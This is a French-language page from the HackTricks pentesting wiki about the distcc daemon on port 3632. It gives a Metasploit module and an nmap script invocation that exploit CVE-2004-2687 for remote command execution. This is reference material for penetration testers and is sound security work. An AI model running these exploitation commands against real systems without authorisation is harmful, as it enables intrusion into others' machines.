hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.4 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Informations de base

Distcc est un outil qui améliore le processus de compilation en utilisant la puissance de traitement inoccupée d'autres ordinateurs sur le réseau. Lorsque distcc est configuré sur une machine, cette machine est capable de distribuer ses tâches de compilation à un autre système. Ce système récepteur doit exécuter le démon distccd et doit avoir un compilateur compatible installé pour traiter le code envoyé.

Port par défaut : 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Vérifiez s'il est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Je ne pense pas que shodan détecte ce service.

Resources

Post créé par Álex B (@r1p)

{% hint style="success" %} Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks
{% endhint %}